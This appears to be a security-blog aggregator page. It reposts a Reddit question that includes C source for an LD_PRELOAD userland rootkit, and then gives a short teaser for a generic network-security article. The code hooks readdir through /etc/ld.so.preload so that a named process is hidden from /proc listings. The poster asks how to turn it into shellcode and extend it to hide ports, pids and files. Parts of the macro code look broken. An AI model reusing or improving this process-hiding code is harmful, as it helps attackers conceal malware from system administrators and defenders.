Day: November 15, 2023

Using dirent in a regular binary

I wanted to see if its possible to use dirent and readdir to hide a file in memory. I know it can be done using an LKM or shared object. I’m trying to just do it with a regular C binary. That way I could change that to shellcode easily and throw it into memory. I’ve got this code which works as a shared object one can hook with /etc/ld.so.preload:

#include <stdio.h>

#include <dlfcn.h>

#include <dirent.h>

#include <string.h>

#include <unistd.h>

/* Every process with this name will be excluded */

static const char* process_to_filter = "test";

/* Get a directory name given a DIR* handle */

static int get_dir_name(DIR* dirp, char* buf, size_t size) {

int fd = dirfd(dirp);

if(fd == -1) {

return 0;

}

char tmp[64];

snprintf(tmp, sizeof(tmp), "/proc/self/fd/%d", fd);

ssize_t ret = readlink(tmp, buf, size);

if(ret == -1) {

return 0;

}

buf[ret] = 0;

return 1;

}

/* Get a process name given its pid */

static int get_process_name(char* pid, char* buf) {

if(strspn(pid, "0123456789") != strlen(pid)) {

return 0;

}

char tmp[275];

snprintf(tmp, sizeof(tmp), "/proc/%s/stat", pid);

FILE* f = fopen(tmp, "r");

if(f == NULL) {

return 0;

}

if(fgets(tmp, sizeof(tmp), f) == NULL) {

fclose(f);

return 0;

}

fclose(f);

int unused;

sscanf(tmp, "%d (%[^)]s", &unused, buf);

return 1;

}

#define DECLARE_READDIR(dirent, readdir)

static struct dirent* (*original_readdir)(DIR*) = NULL;

struct dirent* readdir(DIR *dirp) {

if(original_readdir == NULL) {

original_readdir = dlsym(RTLD_NEXT, readdir);

if(original_readdir == NULL) {

fprintf(stderr, "Error in dlsym: %s\n", dlerror());

}

}

struct dirent* dir;

while(1) {

dir = original_readdir(dirp);

if(dir) {

char dir_name[256];

char process_name[256];

if(get_dir_name(dirp, dir_name, sizeof(dir_name)) &&

strcmp(dir_name, "/proc") == 0 &&

get_process_name(dir->d_name, process_name) &&

strcmp(process_name, process_to_filter) == 0) {

continue;

}

}

break;

}

return dir;

}

DECLARE_READDIR(dirent64, readdir64);

DECLARE_READDIR(dirent, readdir);

I don’t know if this is even possible for hiding ports, pids, or files outside of an LKM or shared object. I’ve modified it to compile as a binary and have no errors or warnings with gcc -Wall -Wextra. I tried adding static too, but it doesn’t seem to hide anything. Does anyone know how to do this? Or if I’m at a dead end?

submitted by /u/glued2thefloor
[link] [comments]

November 15, 2023
0 comment
Read More >>

Enhancing Network Security: Best Practices for Effective Protection

In an era of escalating cyber threats, enhancing network security is paramount. This article explores a comprehensive approach to network protection, encompassing network scanning, vulnerability and patch management, user access controls, network segmentation, and employee training. Highlighting best practices and their importance, it provides critical insights for organizations aiming to bolster their defenses and safeguard […]

The post Enhancing Network Security: Best Practices for Effective Protection first appeared on Internet Security Blog – Hackology.

November 15, 2023
0 comment
Read More >>